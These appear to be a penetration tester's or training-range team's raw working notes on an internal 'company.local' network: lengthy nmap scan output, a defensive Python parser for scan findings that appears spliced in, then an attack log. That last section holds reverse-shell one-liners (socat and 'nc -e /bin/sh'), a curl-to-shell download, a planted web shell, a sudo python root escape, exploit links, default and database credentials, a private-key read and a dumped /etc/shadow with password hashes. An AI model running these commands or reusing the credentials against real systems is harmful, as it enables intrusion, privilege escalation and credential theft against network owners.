| Not valid before: 2022-02-17T13:49:29
|_Not valid after: 2022-08-19T13:49:29
|_ssl-date: 2022-03-11T07:50:43+00:00; -1s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-03-11T07:50:25
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Nmap scan report for 10.11.4.8
Host is up (0.0042s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_8.6 (protocol 2.0)
| ssh-hostkey:
| 3072 23:18:fc:38:62:8f:3d:aa:48:f3:f0:48:8d:17:c5:55 (RSA)
| 256 1b:ba:74:cf:1b:cd:36:cf:0c:09:c1:f3:e4:d3:d0:7f (ECDSA)
|_ 256 49:0f:d6:2a:5b:fd:ec:04:ed:17:5a:8f:0b:a4:1d:77 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: company)
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=BUCHGARM.company.local
| Not valid before: 2022-02-17T13:49:30
|_Not valid after: 2022-08-19T13:49:30
|_ssl-date: 2022-03-11T07:50:44+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: company
| NetBIOS_Domain_Name: company
| NetBIOS_Computer_Name: BUCHGARM
| DNS_Domain_Name: company.local
| DNS_Computer_Name: BUCHGARM.company.local
| DNS_Tree_Name: company.local
| Product_Version: 6.1.7601
|_ System_Time: 2022-03-11T07:50:22+00:00
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49175/tcp open msrpc Microsoft Windows RPC
49176/tcp open msrpc Microsoft Windows RPC
Service Info: Host: BUCHGARM; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -35m59s, deviation: 1h20m28s, median: 0s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: BUCHGARM
| NetBIOS computer name: BUCHGARM\x00
| Domain name: company.local
| Forest name: company.local
| FQDN: BUCHGARM.company.local
|_ System time: 2022-03-11T10:50:25+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-03-11T07:50:25
|_ start_date: 2022-03-10T10:20:56
|_nbstat: NetBIOS name: BUCHGARM, NetBIOS user: <unknown>, NetBIOS MAC: fa:16:3e:dc:d1:b1 (unknown)
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
Nmap scan report for 10.11.4.10
Host is up (0.0039s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2022-03-11T07:50:44+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=sysadminarm.company.local
| Not valid before: 2022-02-17T13:49:30
|_Not valid after: 2022-08-19T13:49:30
| rdp-ntlm-info:
| Target_Name: company
| NetBIOS_Domain_Name: company
| NetBIOS_Computer_Name: SYSADMINARM
| DNS_Domain_Name: company.local
| DNS_Computer_Name: sysadminarm.company.local
| DNS_Tree_Name: company.local
| Product_Version: 10.0.17763
|_ System_Time: 2022-03-11T07:50:22+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-03-11T07:50:28
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Nmap scan report for 10.11.4.13
Host is up (0.0085s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2022-03-11T07:50:44+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=enggeneral.company.local
| Not valid before: 2022-02-17T13:49:28
|_Not valid after: 2022-08-19T13:49:28
| rdp-ntlm-info:
| Target_Name: company
| NetBIOS_Domain_Name: company
| NetBIOS_Computer_Name: ENGGENERAL
| DNS_Domain_Name: company.local
| DNS_Computer_Name: enggeneral.company.local
| DNS_Tree_Name: company.local
| Product_Version: 10.0.17763
|_ System_Time: 2022-03-11T07:50:22+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-03-11T07:50:34
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Post-scan script results:
| clock-skew:
| -35m59s:
| 10.11.4.8
| 10.11.4.13
|_ 10.11.4.10
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 4 IP addresses (4 hosts up) scanned in 106.10 seconds
```
### buf
## 10.11.239.0
### nmap
```bash
nmap 10.11.239.5,6 -sV
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-10 09:09 MSK
Stats: 0:00:37 elapsed; 0 hosts completed (2 up), 2 undergoing Service Scan
Service scan Timing: About 52.63% done; ETC: 09:10 (0:00:32 remaining)
Nmap scan report for 10.11.239.5
Host is up (0.0020s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_8.6 (protocol 2.0)
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: company)
1433/tcp open ms-sql-s Microsoft SQL Server 2012 11.00.7001
3389/tcp open ssl/ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: Host: OIK-SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Nmap scan report for 10.11.239.6
Host is up (0.0011s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_8.6 (protocol 2.0)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: company)
3389/tcp open ssl/ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49176/tcp open msrpc Microsoft Windows RPC
Service Info: Host: OIK-CLIENT; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 81.77 seconds
```
```bash
$ nmap 10.11.239.5,6 -A
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-11 10:58 MSK
Nmap scan report for 10.11.239.5
Host is up (0.0025s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_8.6 (protocol 2.0)
| ssh-hostkey:
| 3072 23:18:fc:38:62:8f:3d:aa:48:f3:f0:48:8d:17:c5:55 (RSA)
| 256 1b:ba:74:cf:1b:cd:36:cf:0c:09:c1:f3:e4:d3:d0:7f (ECDSA)
|_ 256 49:0f:d6:2a:5b:fd:ec:04:ed:17:5a:8f:0b:a4:1d:77 (ED25519)
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: company)
1433/tcp open ms-sql-s Microsoft SQL Server 2012 11.00.7001.00; SP4
|_ssl-date: 2022-03-11T08:00:27+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-02-18T14:41:51
|_Not valid after: 2052-02-18T14:41:51
| ms-sql-ntlm-info:
| Target_Name: company
| NetBIOS_Domain_Name: company
| NetBIOS_Computer_Name: OIK-SERVER
| DNS_Domain_Name: company.local
| DNS_Computer_Name: OIK-SERVER.company.local
| DNS_Tree_Name: company.local
|_ Product_Version: 6.1.7601
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: company
| NetBIOS_Domain_Name: company
| NetBIOS_Computer_Name: OIK-SERVER
| DNS_Domain_Name: company.local
| DNS_Computer_Name: OIK-SERVER.company.local
| DNS_Tree_Name: company.local
| Product_Version: 6.1.7601
|_ System_Time: 2022-03-11T08:00:21+00:00
|_ssl-date: 2022-03-11T08:00:27+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=OIK-SERVER.company.local
| Not valid before: 2022-02-17T13:50:14
|_Not valid after: 2022-08-19T13:50:14
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: Host: OIK-SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -25m42s, deviation: 1h08m02s, median: 0s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: OIK-SERVER, NetBIOS user: <unknown>, NetBIOS MAC: fa:16:3e:c2:6a:80 (unknown)
| ms-sql-info:
| 10.11.239.5:1433:
| Version:
| name: Microsoft SQL Server 2012 SP4
| number: 11.00.7001.00
| Product: Microsoft SQL Server 2012
| Service pack level: SP4
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: OIK-SERVER
| NetBIOS computer name: OIK-SERVER\x00
| Domain name: company.local
| Forest name: company.local
| FQDN: OIK-SERVER.company.local
|_ System time: 2022-03-11T11:00:21+03:00
| smb2-time:
| date: 2022-03-11T08:00:21
|_ start_date: 2022-02-18T14:41:50
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
Nmap scan report for 10.11.239.6
Host is up (0.00085s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_8.6 (protocol 2.0)
| ssh-hostkey:
| 3072 23:18:fc:38:62:8f:3d:aa:48:f3:f0:48:8d:17:c5:55 (RSA)
| 256 1b:ba:74:cf:1b:cd:36:cf:0c:09:c1:f3:e4:d3:d0:7f (ECDSA)
|_ 256 49:0f:d6:2a:5b:fd:ec:04:ed:17:5a:8f:0b:a4:1d:77 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: company)
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2022-03-11T08:00:27+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: company
| NetBIOS_Domain_Name: company
| NetBIOS_Computer_Name: OIK-CLIENT
| DNS_Domain_Name: company.local
| DNS_Computer_Name: OIK-CLIENT.company.local
| DNS_Tree_Name: company.local
| Product_Version: 6.1.7601
|_ System_Time: 2022-03-11T08:00:21+00:00
| ssl-cert: Subject: commonName=OIK-CLIENT.company.local
| Not valid before: 2022-02-17T13:49:31
|_Not valid after: 2022-08-19T13:49:31
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49176/tcp open msrpc Microsoft Windows RPC
Service Info: Host: OIK-CLIENT; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: OIK-CLIENT, NetBIOS user: <unknown>, NetBIOS MAC: fa:16:3e:cf:30:92 (unknown)
| smb2-time:
| date: 2022-03-11T08:00:22
|_ start_date: 2022-02-18T14:51:05
|_clock-skew: mean: -35m59s, deviation: 1h20m29s, median: 0s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: OIK-CLIENT
| NetBIOS computer name: OIK-CLIENT\x00
| Domain name: company.local
| Forest name: company.local
| FQDN: OIK-CLIENT.company.local
|_ System time: 2022-03-11T11:00:22+03:00
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
Post-scan script results:
| ssh-hostkey: Possible duplicate hosts
| Key 3072 23:18:fc:38:62:8f:3d:aa:48:f3:f0:48:8d:17:c5:55 (RSA) used by:
| 10.11.239.5
| 10.11.239.6
| Key 256 49:0f:d6:2a:5b:fd:ec:04:ed:17:5a:8f:0b:a4:1d:77 (ED25519) used by:
| 10.11.239.5
| 10.11.239.6
| Key 256 1b:ba:74:cf:1b:cd:36:cf:0c:09:c1:f3:e4:d3:d0:7f (ECDSA) used by:
| 10.11.239.5
|_ 10.11.239.6
| clock-skew:
| -25m42s:
| 10.11.239.5
|_ 10.11.239.6
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 88.26 seconds
```
### buf
## 10.11.240.0
### nmap
```bash
nmap 10.11.240.5,6,9,10,14 -sV
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-10 09:12 MSK
Stats: 0:00:18 elapsed; 0 hosts completed (5 up), 5 undergoing Service Scan
Service scan Timing: About 42.11% done; ETC: 09:13 (0:00:23 remaining)
Nmap scan report for 10.11.240.5
Host is up (0.0044s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http JBoss Enterprise Application Platform
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.11.240.6
Host is up (0.0033s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http JBoss Enterprise Application Platform
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.11.240.9
Host is up (0.0042s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http JBoss Enterprise Application Platform
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.11.240.10
Host is up (0.0057s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http JBoss Enterprise Application Platform
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.11.240.14
Host is up (0.0068s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_8.6 (protocol 2.0)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: ELTO-ENTEK; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 5 IP addresses (5 hosts up) scanned in 71.15 seconds
```
```bash
$ nmap 10.11.240.5,6,9,10,14 -A
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-11 11:01 MSK
Nmap scan report for 10.11.240.5
Host is up (0.0031s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 61:d8:f2:78:92:14:75:e6:9e:d4:ed:f0:b2:e6:44:2f (RSA)
| 256 bd:8f:6c:3f:d8:18:bb:97:fd:33:d7:c4:1f:4f:2c:b6 (ECDSA)
|_ 256 30:4f:4f:3d:a1:0b:e4:17:6f:b4:36:72:02:0f:d9:07 (ED25519)
80/tcp open http JBoss Enterprise Application Platform
|_http-title: SIEDWEB
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.11.240.6
Host is up (0.0045s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 52:cb:a2:13:84:e5:f3:42:4a:f1:30:30:b3:e3:e2:7a (RSA)
| 256 de:29:b3:5c:50:fc:e6:f1:be:e4:29:6a:ba:e4:47:da (ECDSA)
|_ 256 1c:53:b3:a6:85:a9:25:ce:59:4a:45:19:49:84:f9:b4 (ED25519)
80/tcp open http JBoss Enterprise Application Platform
|_http-title: SIEDWEB
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.11.240.9
Host is up (0.0064s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b4:dd:f5:7a:e2:c4:93:73:3e:ce:45:1b:1d:79:c3:18 (RSA)
| 256 bb:2f:86:6a:9e:a2:d4:9c:56:e7:79:75:7a:c8:0e:e7 (ECDSA)
|_ 256 fe:69:5a:3d:bf:fe:6c:86:41:7a:db:c7:d3:7c:ed:6c (ED25519)
80/tcp open http JBoss Enterprise Application Platform
|_http-title: SIEDWEB
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.11.240.10
Host is up (0.0055s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:c3:a5:0a:7c:6e:44:d9:d6:9c:7c:3d:7a:91:9a:93 (RSA)
| 256 be:76:29:57:0f:6d:b6:3c:c8:72:df:0f:07:b8:1a:fa (ECDSA)
|_ 256 b3:2a:9f:20:30:3c:2e:b5:fc:97:99:e8:7f:2f:60:c1 (ED25519)
80/tcp open http JBoss Enterprise Application Platform
|_http-title: SIEDWEB
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.11.240.14
Host is up (0.011s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_8.6 (protocol 2.0)
| ssh-hostkey:
| 3072 23:18:fc:38:62:8f:3d:aa:48:f3:f0:48:8d:17:c5:55 (RSA)
| 256 1b:ba:74:cf:1b:cd:36:cf:0c:09:c1:f3:e4:d3:d0:7f (ECDSA)
|_ 256 49:0f:d6:2a:5b:fd:ec:04:ed:17:5a:8f:0b:a4:1d:77 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2022-03-11T08:02:52+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=elto-entek
| Not valid before: 2022-02-17T05:58:15
|_Not valid after: 2022-08-19T05:58:15
| rdp-ntlm-info:
| Target_Name: ELTO-ENTEK
| NetBIOS_Domain_Name: ELTO-ENTEK
| NetBIOS_Computer_Name: ELTO-ENTEK
| DNS_Domain_Name: elto-entek
| DNS_Computer_Name: elto-entek
| Product_Version: 6.1.7601
|_ System_Time: 2022-03-11T08:02:47+00:00
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: ELTO-ENTEK; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-03-11T08:02:46
|_ start_date: 2022-02-18T05:59:14
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: elto-entek
| NetBIOS computer name: ELTO-ENTEK\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-03-11T11:02:46+03:00
|_nbstat: NetBIOS name: ELTO-ENTEK, NetBIOS user: <unknown>, NetBIOS MAC: fa:16:3e:34:bb:98 (unknown)
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
|_clock-skew: mean: -36m00s, deviation: 1h20m29s, median: 0s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 5 IP addresses (5 hosts up) scanned in 86.64 seconds
```
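The `-A` scans above carry three hygiene findings that are easy to lose in raw output: SMB message signing is enabled but not required (and `smb-security-mode` reports it disabled) on the Windows hosts, RDP is exposed on Windows 7 build 7601, and 10.11.239.5, 10.11.239.6 and 10.11.240.14 present identical OpenSSH host keys, which nmap itself flags as "Possible duplicate hosts". The Python below is an added example, not part of these notes or of nmap: it parses a constructed, trimmed copy of the normal output above into per-host records and turns them into findings. The regexes, the `HostReport` class and the function names are this example's own.

```python
"""Added example (not from the original notes): triage nmap normal output for
SMB signing, RDP on end-of-life Windows 7 and SSH host keys shared by hosts.
SAMPLE_NMAP is constructed from the scan reports above, trimmed to the lines
the parser uses."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

SAMPLE_NMAP = """\
Nmap scan report for 10.11.239.5
22/tcp   open  ssh               OpenSSH for_Windows_8.6 (protocol 2.0)
| ssh-hostkey:
|   3072 23:18:fc:38:62:8f:3d:aa:48:f3:f0:48:8d:17:c5:55 (RSA)
|_  256 49:0f:d6:2a:5b:fd:ec:04:ed:17:5a:8f:0b:a4:1d:77 (ED25519)
445/tcp  open  microsoft-ds      Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: company)
3389/tcp open  ssl/ms-wbt-server?
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
Nmap scan report for 10.11.239.6
22/tcp   open  ssh               OpenSSH for_Windows_8.6 (protocol 2.0)
| ssh-hostkey:
|   3072 23:18:fc:38:62:8f:3d:aa:48:f3:f0:48:8d:17:c5:55 (RSA)
|_  256 49:0f:d6:2a:5b:fd:ec:04:ed:17:5a:8f:0b:a4:1d:77 (ED25519)
445/tcp  open  microsoft-ds      Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: company)
3389/tcp open  ssl/ms-wbt-server?
| smb2-security-mode:
|   2.1:
|_    Message signing enabled but not required
Nmap scan report for 10.11.240.5
22/tcp   open  ssh               OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_  2048 61:d8:f2:78:92:14:75:e6:9e:d4:ed:f0:b2:e6:44:2f (RSA)
80/tcp   open  http              JBoss Enterprise Application Platform
"""

REPORT_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)\s*(.*)$")
HOSTKEY_RE = re.compile(r"^\|_?\s+\d+\s+([0-9a-f]{2}(?::[0-9a-f]{2}){15})\s+\((\w+)\)$")


@dataclass
class HostReport:
    ip: str
    open_ports: Dict[int, str] = field(default_factory=dict)  # port -> service/version text
    ssh_hostkeys: List[str] = field(default_factory=list)    # fingerprints seen on this host
    smb_signing_required: Optional[bool] = None              # None: no SMB script output
    eol_windows7: bool = False                               # build 7601 / 6.1 seen anywhere


def parse_nmap(text: str) -> Dict[str, HostReport]:
    """Split normal output into per-host reports and pull out what the audit needs."""
    reports: Dict[str, HostReport] = {}
    current: Optional[HostReport] = None
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            current = HostReport(ip=m.group(1))
            reports[current.ip] = current
            continue
        if current is None:
            continue
        if "Windows 7" in line or "6.1.7601" in line:
            current.eol_windows7 = True
        if "message_signing: disabled" in line or "enabled but not required" in line:
            current.smb_signing_required = False  # the weaker answer always wins
        elif ("message_signing: required" in line or "enabled and required" in line) \
                and current.smb_signing_required is None:
            current.smb_signing_required = True
        m = PORT_RE.match(line)
        if m:
            current.open_ports[int(m.group(1))] = f"{m.group(2)} {m.group(3)}".strip()
            continue
        m = HOSTKEY_RE.match(line)
        if m:
            current.ssh_hostkeys.append(m.group(1))
    return reports


def findings(reports: Dict[str, HostReport]) -> List[str]:
    """Turn parsed reports into hardening findings a defender would track."""
    out: List[str] = []
    key_owners: Dict[str, List[str]] = {}
    for ip, r in sorted(reports.items()):
        if r.smb_signing_required is False:
            out.append(f"{ip}: SMB signing not required; enforce signing to block NTLM relay")
        if 3389 in r.open_ports and r.eol_windows7:
            out.append(f"{ip}: RDP exposed on end-of-life Windows 7 (build 7601)")
        for fp in r.ssh_hostkeys:
            key_owners.setdefault(fp, []).append(ip)
    for fp, ips in sorted(key_owners.items()):
        if len(ips) > 1:  # same host key on several machines: cloned image, regenerate
            out.append(f"SSH host key {fp} shared by {', '.join(ips)}; regenerate per host")
    return out
```

Run `findings(parse_nmap(open("scan.nmap").read()))` over a saved `-oN` file to get the same three classes of finding for a real scan; the shared-key check is the one that most often reveals cloned images behind an "SSH for Windows" deployment.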
### buf
# Dump new stuff here
10.11.3.20 - mx1.company.local
10.11.3.10 - ns2.company.local
10.11.3.50 - ns1.company.local
## For me
Ищу команду_WordPress_ФИНАЛЬНЫЙ ОТВЕТ №1
## Interesting things to do
10.11.2.10:80:8080
10.11.2.11 - Atrium web
10.11.240.5:80
10.11.240.10:80
http://10.11.2.10/wp-login.php
admin:admin
http://10.11.2.10/shell.php - we put it up ourselves
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242
https://github.com/flozz/p0wny-shell
nc -e /bin/sh 10.11.5.11 1337
sudo python -c 'import os; os.system("/bin/sh")'
```bash
cat ~/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----
```
```
ssh-rsa ... kali@kali
```
www-data ALL=(ALL:ALL) NOPASSWD: /usr/bin/python
https://github.com/dreadlocked/Drupalgeddon2
sudo gem install highline
'username' => 'drupaluser',
'password' => 'DruP@ss531',
https://book.hacktricks.xyz/pentesting/pentesting-rdp
custarm.company.local - 10.11.4.6
https://gist.githubusercontent.com/KrE80r/42f8629577db95782d5e4f609f437a54/raw/71c902f55c09aa8ced351690e1e627363c231b45/c0w.c
## New things
### Hashes
```bash
$ cat /etc/shadow
root:$6$V91B2eA4NLQDXkK.$8HMq13zriCVZq2Wdz4hQmq.wSJg6oDCa3ExX9LQKTTHT7s9gk6u45bCc2IzRzymrmxF8zegOh/YrAA8jyTCsz0:18779:0:99999:7:::
daemon:*:18779:0:99999:7:::
bin:*:18779:0:99999:7:::
sys:*:18779:0:99999:7:::
sync:*:18779:0:99999:7:::
games:*:18779:0:99999:7:::
man:*:18779:0:99999:7:::
lp:*:18779:0:99999:7:::
mail:*:18779:0:99999:7:::
news:*:18779:0:99999:7:::
uucp:*:18779:0:99999:7:::
proxy:*:18779:0:99999:7:::
www-data:*:18779:0:99999:7:::
backup:*:18779:0:99999:7:::
list:*:18779:0:99999:7:::
irc:*:18779:0:99999:7:::
gnats:*:18779:0:99999:7:::
nobody:*:18779:0:99999:7:::
_apt:*:18779:0:99999:7:::
systemd-timesync:*:18779:0:99999:7:::
systemd-network:*:18779:0:99999:7:::
systemd-resolve:*:18779:0:99999:7:::
messagebus:*:18779:0:99999:7:::
sshd:*:18779:0:99999:7:::
cadm:$6$FXKabw570kGSXnL6$FfQUkrSUB7HtFXWuAwJlSV/YrFB0Vel8nJ.sZ9dOV.P/0icxeY5N/mNjW8HK/WBY20KYhq84jkIw44yaym3jt1:18779:0:99999:7:::
systemd-coredump:!!:18779::::::
mysql:!:18779:0:99999:7:::
